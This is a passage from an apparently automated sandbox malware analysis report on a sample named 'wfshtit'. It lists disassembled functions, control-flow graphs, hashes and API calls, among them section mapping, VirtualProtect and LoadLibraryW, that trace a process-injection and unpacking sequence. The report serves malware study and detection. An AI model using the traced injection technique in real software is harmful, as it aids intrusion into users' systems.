                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401626
                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401667
                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401698
                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951493417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 1546783058-0
                                                                                                          • Opcode ID: 3809ac319917b6d3bab6ba358ca8ba8e52c3928ac3e1657726bd27ab975abf26
                                                                                                          • Instruction ID: bcfd12d57f681495948eb5138da1c6a4081ea1a5ed11d5619747b33be395d59e
                                                                                                          • Opcode Fuzzy Hash: 3809ac319917b6d3bab6ba358ca8ba8e52c3928ac3e1657726bd27ab975abf26
                                                                                                          • Instruction Fuzzy Hash: 8C510A71900245BFEB209F92CC48FEFBBB8EF85750F104159F911BA1A5E6749941CB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 00423B30 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 461memorylibraryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 261 423b30-423b6a call 40e8b0 264 423b70-423b76 261->264 265 423b78-423b7c 264->265 266 423b7e-423b84 264->266 265->266 267 423b86-423b8e 266->267 268 423b9a-423ba1 266->268 267->268 270 423b90-423b98 267->270 268->264 271 423ba3-423bad 268->271 270->268 270->271 272 423bb3-423c13 271->272 273 423ca6-423cba 271->273 317 423c16-423c1b 272->317 274 423cc0-423cc6 273->274 276 423cd3-423cda 274->276 277 423cc8-423ccd 274->277 278 423cef-423cf6 276->278 279 423cdc-423cec 276->279 277->276 278->274 280 423cf8-423d1a LocalAlloc 278->280 279->278 282 423d7a-423d7d 280->282 283 423d1c-423d22 280->283 286 423d83-423e23 282->286 287 423e28-423e40 282->287 285 423d28-423d2d 283->285 290 423d51-423d5e call 4238b0 285->290 291 423d2f-423d47 285->291 286->287 289 423e48-423e4b 287->289 293 423e78-423e7d 289->293 294 423e4d-423e73 289->294 305 423d60-423d70 290->305 306 423d75-423d78 290->306 291->290 299 423e83-423f88 293->299 300 423f8d-423f91 293->300 294->293 299->300 300->289 307 423f97-423fae 300->307 305->306 306->282 306->285 308 423fb0-423fc3 307->308 335 423fc5-423fcb 308->335 317->317 320 423c1d-423c24 317->320 323 423c30-423c33 320->323 324 423c26 320->324 325 423c43-423c45 323->325 326 423c35-423c41 323->326 324->323 328 423c52-423c5c 325->328 329 423c47-423c4b 325->329 334 423c50 326->334 336 423c5e-423c66 328->336 337 423c8d-423c91 328->337 329->334 334->328 341 423fd0-423fda 335->341 342 423c68 336->342 343 423c6c-423c83 call 40b470 336->343 339 423c93-423c9d 337->339 340 423ca0 337->340 339->340 340->273 345 423fe0-423fe1 341->345 346 423fdc 341->346 342->343 354 423c85 343->354 355 423c89 343->355 345->341 350 423fe3-42400f VirtualProtect call 423ae0 345->350 346->345 359 424011-42401b 350->359 354->355 355->337 360 42402a-424030 359->360 361 42401d-424026 359->361 363 424032 call 423890 360->363 364 424037-42403e 360->364 361->360 363->364 364->359 367 424040-4240c3 LoadLibraryW 364->367 369 42415a-424171 367->369 370 4240c9-424154 367->370 370->369
                                                                                                          APIs
                                                                                                          • LocalAlloc.KERNELBASE(00000000,022826CC,?,?,?,?,?,?,004264D6,000000FF), ref: 00423D00
                                                                                                          • VirtualProtect.KERNELBASE(0044585C,022826CC,00000040,?,?,?,?,?,?,?,004264D6,000000FF), ref: 00423FFE
                                                                                                          • LoadLibraryW.KERNELBASE(02278708,?,?,?,?,?,?,004264D6,000000FF), ref: 004240B3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951496757.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_409000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocLibraryLoadLocalProtectVirtual
                                                                                                          • String ID: t^:
                                                                                                          • API String ID: 2324553274-1317908726
                                                                                                          • Opcode ID: 2f6e8738e1bd21b89a99e9e903676fc1c4d7815a6bff1382dd3cd4f2f7249fd3
                                                                                                          • Instruction ID: 53ed1037903d383489416d60ef8bb9d8d58e8adcb2ab3f709d755fd7c33fd46c
                                                                                                          • Opcode Fuzzy Hash: 2f6e8738e1bd21b89a99e9e903676fc1c4d7815a6bff1382dd3cd4f2f7249fd3
                                                                                                          • Instruction Fuzzy Hash: 1BF1F971644340ABE320EFA1ED49F5B77B4EB88B01F40452EF785A71E0D7B89944CB6A
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0251BE21 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 393 251be21-251be3a 394 251be3c-251be3e 393->394 395 251be40 394->395 396 251be45-251be51 CreateToolhelp32Snapshot 394->396 395->396 397 251be61-251be6e Module32First 396->397 398 251be53-251be59 396->398 399 251be70-251be71 call 251bae0 397->399 400 251be77-251be7f 397->400 398->397 403 251be5b-251be5f 398->403 404 251be76 399->404 403->394 403->397 404->400
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0251BE49
                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 0251BE69
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951734565.0000000002516000.00000040.00000020.00020000.00000000.sdmp, Offset: 02516000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_2516000_wfshtit.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                          • String ID:
                                                                                                          • API String ID: 3833638111-0
                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                          • Instruction ID: d568fd1fc97e136f4dc0f9b58ef73be59f5485cf7a818e1d63ddab7ca3a87c92
                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                          • Instruction Fuzzy Hash: F7F096325007156FE7203BF9A88DB6FB6ECFF49728F100628E742D14C0DB70E8458A65
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0040DA32 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 406 40da32-40da3c 407 40da59-40da62 406->407 408 40da3e-40da48 406->408 410 40da64 407->410 411 40da65-40da6a 407->411 408->407 409 40da4a-40da58 408->409 410->411 412 40da6c-40da7d RtlAllocateHeap 411->412 413 40da7f-40da86 411->413 412->413 415 40dab1-40dab3 412->415 416 40daa4-40daa9 413->416 417 40da88-40da91 call 40907e 413->417 416->415 419 40daab 416->419 417->411 421 40da93-40da98 417->421 419->415 422 40daa0-40daa2 421->422 423 40da9a 421->423 422->415 423->422
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0040ADF9,?,?,00000000), ref: 0040DA75
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951496757.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_409000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: e497a4a9dd89ed2a6d64911c88cc1a1e829b5dfae084f140ca0cdee55dcbb27e
                                                                                                          • Instruction ID: 3538c249809fad65a19d3fc31e948527158e10f5b837de61f7a0b7f97e5c81a4
                                                                                                          • Opcode Fuzzy Hash: e497a4a9dd89ed2a6d64911c88cc1a1e829b5dfae084f140ca0cdee55dcbb27e
                                                                                                          • Instruction Fuzzy Hash: 3701B131B092159BEB289FA5CC14B673394AF81760F04463AA806EB2E0D77C9C04CE88
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0040A928 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 424 40a928-40a937 426 40a939-40a93c 424->426 427 40a93d-40a940 424->427 428 40a952-40a95a call 40ad9e 427->428 429 40a942-40a948 427->429 432 40a95f-40a964 428->432 429->429 430 40a94a-40a950 429->430 430->428 430->429 433 40a973-40a97e call 40b470 432->433 434 40a966-40a972 432->434 433->434
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951496757.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_409000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __malloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 3464615804-0
                                                                                                          • Opcode ID: bf19376d0f04960d0d954e6c63c8720db25be3dbb312c4520880d50d63a98be5
                                                                                                          • Instruction ID: bf3fae0e5f08207209406d72f62b85fd138407474cce995d875b339fbe823418
                                                                                                          • Opcode Fuzzy Hash: bf19376d0f04960d0d954e6c63c8720db25be3dbb312c4520880d50d63a98be5
                                                                                                          • Instruction Fuzzy Hash: 6DF0E9B76002106ACB357B34BC45C9B2728DED536530B4837F401E3391F63C8E5183AA
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004018C9 Relevance: 1.3, APIs: 1, Instructions: 64sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 438 4018c9-40192e call 401186 Sleep call 4013fb 452 401930-401938 call 4014f4 438->452 453 40193d-401986 call 401186 438->453 452->453
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                                                            • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                            • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951493417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4152845823-0
                                                                                                          • Opcode ID: 53c9cd3384d2906c802fe6f3e3e31b8b704e5f86a1bc45d71cf18f0f00b039c7
                                                                                                          • Instruction ID: e62ef0a5377d8aa3a211eebfa9e1192b8d220afb4109f2d02ab252a4e2d2aae2
                                                                                                          • Opcode Fuzzy Hash: 53c9cd3384d2906c802fe6f3e3e31b8b704e5f86a1bc45d71cf18f0f00b039c7
                                                                                                          • Instruction Fuzzy Hash: CA118EB220C305FADB006A949C91EBA36689B11714F308137BB53790F1A57C9653F76F
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004018E5 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 467 4018e5-40192e call 401186 Sleep call 4013fb 481 401930-401938 call 4014f4 467->481 482 40193d-401986 call 401186 467->482 481->482
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                                                            • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                            • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951493417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4152845823-0
                                                                                                          • Opcode ID: 4ed9d038ad82778c0538dd9e301f09955b0ecda2ba93e19649321b1be2ae3255
                                                                                                          • Instruction ID: 05c04d2ad09f16b9b87c287c864bc9b7ec61e89fae5dcaecab9d0654b7c4e063
                                                                                                          • Opcode Fuzzy Hash: 4ed9d038ad82778c0538dd9e301f09955b0ecda2ba93e19649321b1be2ae3255
                                                                                                          • Instruction Fuzzy Hash: BB015BB220C305EADB006A949D62EB932649B15715F308137BA53790F1957C8653F61B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004018D4 Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 496 4018d4-40192e call 401186 Sleep call 4013fb 508 401930-401938 call 4014f4 496->508 509 40193d-401986 call 401186 496->509 508->509
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                                                            • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                            • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951493417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4152845823-0
                                                                                                          • Opcode ID: 6bef9fa10c94b4d929980f6de66e1a6c4508e267192d79ae07afb604da632a6a
                                                                                                          • Instruction ID: fce81954366252da7adbbdf3d64cc03e59f8ef64e68a90b3f3f5323062df9ebf
                                                                                                          • Opcode Fuzzy Hash: 6bef9fa10c94b4d929980f6de66e1a6c4508e267192d79ae07afb604da632a6a
                                                                                                          • Instruction Fuzzy Hash: FF016DB220C305EADB006A949C61EAA37645B51715F348137BA53B90F1D57C8653F62B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004018F4 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 523 4018f4-40192e call 401186 Sleep call 4013fb 534 401930-401938 call 4014f4 523->534 535 40193d-401986 call 401186 523->535 534->535
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                                                            • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                            • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951493417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4152845823-0
                                                                                                          • Opcode ID: 3b2755767c2db92140373cfbb1f56a3cbda9640d3fbd25a37bb45c91bc9b33cf
                                                                                                          • Instruction ID: 61556fbd74693c1122d25878dabab91872ca5c85c54c0931cf2d8ffcbe0fb9f5
                                                                                                          • Opcode Fuzzy Hash: 3b2755767c2db92140373cfbb1f56a3cbda9640d3fbd25a37bb45c91bc9b33cf
                                                                                                          • Instruction Fuzzy Hash: 5A0178B2248306FADB006AA49CA1EB932249B55715F308137FB13B90F1D57C8653F72B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004018E9 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 549 4018e9-40192e call 401186 Sleep call 4013fb 558 401930-401938 call 4014f4 549->558 559 40193d-401986 call 401186 549->559 558->559
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                                                            • Part of subcall function 004014F4: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015B8
                                                                                                            • Part of subcall function 004014F4: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951493417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4152845823-0
                                                                                                          • Opcode ID: 374dd4e1e0cffe5c307a426bb944a598177891720c0ffdd1d7a0e73783737b7f
                                                                                                          • Instruction ID: 0cfdbf57c40ebd16915b75e0bcaa31018d6035999b4c8e4d4561116cd1d9419c
                                                                                                          • Opcode Fuzzy Hash: 374dd4e1e0cffe5c307a426bb944a598177891720c0ffdd1d7a0e73783737b7f
                                                                                                          • Instruction Fuzzy Hash: FA017CB2208305FADB006AA09C61EA937649B55715F30813BFA53780F1957D8653F62B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 004018FC Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 573 4018fc-40192e call 401186 Sleep call 4013fb 580 401930-401938 call 4014f4 573->580 581 40193d-401986 call 401186 573->581 580->581
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401919
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951493417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_400000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 3472027048-0
                                                                                                          • Opcode ID: 001f3e1c90e0c9d478250d7b774a10e9bedc05eb8f5a2ddccafa56d5773fc4c0
                                                                                                          • Instruction ID: 8924cd936244c1d255e5b8ad3bd9668b31b5227b00448509fbcd462ac300149e
                                                                                                          • Opcode Fuzzy Hash: 001f3e1c90e0c9d478250d7b774a10e9bedc05eb8f5a2ddccafa56d5773fc4c0
                                                                                                          • Instruction Fuzzy Hash: 9A018FB2208305BBDF006AE08C62EA93B645F15315F244477FA53B91F2D57C9A52E72B
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0251BAE0 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0251BB31
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951734565.0000000002516000.00000040.00000020.00020000.00000000.sdmp, Offset: 02516000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_2516000_wfshtit.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                          • Instruction ID: 3558c7483e93da9cd2dd87c92e6884033f1cae8588598d4ac977322ca8e72768
                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                          • Instruction Fuzzy Hash: DF112879A00208EFDB01DF98C985E98BBF5AF08351F0580A5F9889B361D771EA90DF84
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions

                                                                                                          Function 0040E544 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.951496757.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_409000_wfshtit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                          • String ID:
                                                                                                          • API String ID: 3016257755-0
                                                                                                          • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                          • Instruction ID: 80ad4cdf73c45067d2aae9fb16ef147e77cb583fea3ae84cb04fc497d1be8e1e
                                                                                                          • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                          • Instruction Fuzzy Hash: 33114772400149FBCF125ED6CC05CEE3F62BB5C358F548826FA5869171D33AD971AB85
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:10.9%
                                                                                                          Dynamic/Decrypted Code Coverage:15.3%
                                                                                                          Signature Coverage:1.2%
                                                                                                          Total number of Nodes:1582
                                                                                                          Total number of Limit Nodes:93
                                                                                                          execution_graph 58326 6f048f07 58327 6f048f0f 58326->58327 58344 6f0469c0 58327->58344 58329 6f048f4b 58330 6f04ae62 SafeArrayDestroy 58329->58330 58331 6f04ae68 58329->58331 58330->58331 58332 6f04ae72 SafeArrayDestroy 58331->58332 58333 6f04ae7b 58331->58333 58332->58333 58334 6f04ae85 SafeArrayDestroy 58333->58334 58335 6f04ae8e 58333->58335 58334->58335 58336 6f04aea1 58335->58336 58337 6f04ae98 SafeArrayDestroy 58335->58337 58338 6f04aeb4 58336->58338 58339 6f04aeab SafeArrayDestroy 58336->58339 58337->58336 58340 6f04aec7 58338->58340 58341 6f04aebe SafeArrayDestroy 58338->58341 58339->58338 58351 6f08948b 58340->58351 58341->58340 58343 6f04aef5 58345 6f046a01 SafeArrayGetLBound SafeArrayGetUBound 58344->58345 58346 6f0469f3 58344->58346 58347 6f046a2a 58345->58347 58350 6f046a92 58345->58350 58346->58345 58348 6f046a30 SafeArrayGetElement 58347->58348 58347->58350 58359 6f043990 58347->58359 58348->58347 58348->58350 58350->58329 58352 6f089493 58351->58352 58353 6f089495 IsDebuggerPresent 58351->58353 58352->58343 58382 6f090036 58353->58382 58356 6f08ce7e SetUnhandledExceptionFilter UnhandledExceptionFilter 58357 6f08ce9b __call_reportfault 58356->58357 58358 6f08cea3 GetCurrentProcess TerminateProcess 58356->58358 58357->58358 58358->58343 58361 6f0439cc 58359->58361 58360 6f043a61 58360->58347 58361->58360 58364 6f043a90 58361->58364 58367 6f043ad7 58364->58367 58365 6f043a34 58365->58347 58366 6f043bce SafeArrayDestroy 58366->58365 58368 6f043b65 SafeArrayGetLBound SafeArrayGetUBound 58367->58368 58371 6f043bb7 58367->58371 58369 6f043b97 58368->58369 58368->58371 58369->58371 58372 6f043c10 SafeArrayGetElement 58369->58372 58371->58365 58371->58366 58373 6f043dc9 58372->58373 58374 6f043c57 58372->58374 58373->58369 58374->58373 58375 6f043c7d VariantInit 58374->58375 58381 6f043c9e 58375->58381 58376 6f043d16 VariantClear 58377 6f043d2c VariantClear 58376->58377 58378 6f043d3d 58376->58378 58377->58373 58378->58377 58379 6f043d85 VariantClear 58378->58379 58380 6f043d95 58379->58380 58380->58369 58381->58376 58382->58356 58383 6f036bc0 58384 6f036bde 58383->58384 58385 6f036c26 58384->58385 58393 6f089d21 58384->58393 58387 6f036bf7 58388 6f036c1d 58387->58388 58397 6f035300 58387->58397 58392 6f036c3c 58394 6f08e8d5 __EH_prolog3_catch 58393->58394 58405 6f089bb5 58394->58405 58396 6f08e8ed _Fac_tidy 58396->58387 58399 6f035322 58397->58399 58398 6f035329 58398->58388 58401 6f036c60 SafeArrayCreateVector SafeArrayAccessData 58398->58401 58399->58398 58485 6f035840 5 API calls __cftof_l 58399->58485 58402 6f036c91 _memmove 58401->58402 58403 6f036cad 58401->58403 58404 6f036c9f SafeArrayUnaccessData 58402->58404 58403->58392 58404->58403 58408 6f089bbf 58405->58408 58407 6f089bd9 58407->58396 58408->58407 58412 6f089bdb std::exception::exception 58408->58412 58417 6f089d66 58408->58417 58434 6f08c86e DecodePointer 58408->58434 58410 6f089c19 58438 6f0895c1 66 API calls std::exception::operator= 58410->58438 58412->58410 58435 6f089af4 58412->58435 58413 6f089c23 58439 6f08ac75 RaiseException 58413->58439 58416 6f089c34 58418 6f089de3 58417->58418 58423 6f089d74 58417->58423 58446 6f08c86e DecodePointer 58418->58446 58420 6f089d7f 58420->58423 58440 6f08d74e 66 API calls __NMSG_WRITE 58420->58440 58441 6f08d59f 66 API calls 6 library calls 58420->58441 58442 6f08d279 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 58420->58442 58421 6f089de9 58447 6f08d7d8 66 API calls __getptd_noexit 58421->58447 58423->58420 58425 6f089da2 RtlAllocateHeap 58423->58425 58428 6f089dcf 58423->58428 58432 6f089dcd 58423->58432 58443 6f08c86e DecodePointer 58423->58443 58425->58423 58426 6f089ddb 58425->58426 58426->58408 58444 6f08d7d8 66 API calls __getptd_noexit 58428->58444 58445 6f08d7d8 66 API calls __getptd_noexit 58432->58445 58434->58408 58448 6f089ab8 58435->58448 58437 6f089b01 58437->58410 58438->58413 58439->58416 58440->58420 58441->58420 58443->58423 58444->58432 58445->58426 58446->58421 58447->58426 58449 6f089ac4 _doexit 58448->58449 58456 6f08d291 58449->58456 58455 6f089ae5 _doexit 58455->58437 58473 6f092438 58456->58473 58458 6f089ac9 58459 6f0899d1 RtlDecodePointer DecodePointer 58458->58459 58460 6f089a80 58459->58460 58461 6f0899ff 58459->58461 58472 6f089aee LeaveCriticalSection __cinit 58460->58472 58461->58460 58482 6f08d21b 67 API calls __cftof_l 58461->58482 58463 6f089a11 58464 6f089a63 EncodePointer EncodePointer 58463->58464 58465 6f089a3b 58463->58465 58466 6f089a2c 58463->58466 58464->58460 58465->58460 58467 6f089a35 58465->58467 58483 6f08cb74 70 API calls __realloc_crt 58466->58483 58467->58465 58470 6f089a51 EncodePointer 58467->58470 58484 6f08cb74 70 API calls __realloc_crt 58467->58484 58470->58464 58471 6f089a4b 58471->58460 58471->58470 58472->58455 58474 6f09244d 58473->58474 58475 6f092460 EnterCriticalSection 58473->58475 58480 6f092376 66 API calls 8 library calls 58474->58480 58475->58458 58477 6f092453 58477->58475 58481 6f08d4f6 66 API calls 3 library calls 58477->58481 58480->58477 58482->58463 58483->58467 58484->58471 58485->58398 59777 1134f00 59778 1134f17 59777->59778 59779 1134f1e 59777->59779 59778->59779 59783 113a710 59778->59783 59788 113a478 59778->59788 59793 113a469 59778->59793 59784 113a6f1 59783->59784 59785 113a745 59784->59785 59798 113aea0 59784->59798 59807 113ae8f 59784->59807 59785->59779 59789 113a480 59788->59789 59790 113a49c 59788->59790 59789->59790 59791 113aea0 343 API calls 59789->59791 59792 113ae8f 343 API calls 59789->59792 59790->59779 59791->59790 59792->59790 59795 113a472 59793->59795 59794 113a49c 59794->59779 59795->59794 59796 113aea0 343 API calls 59795->59796 59797 113ae8f 343 API calls 59795->59797 59796->59794 59797->59794 59799 113aec7 59798->59799 59816 113af58 59799->59816 59822 113afa8 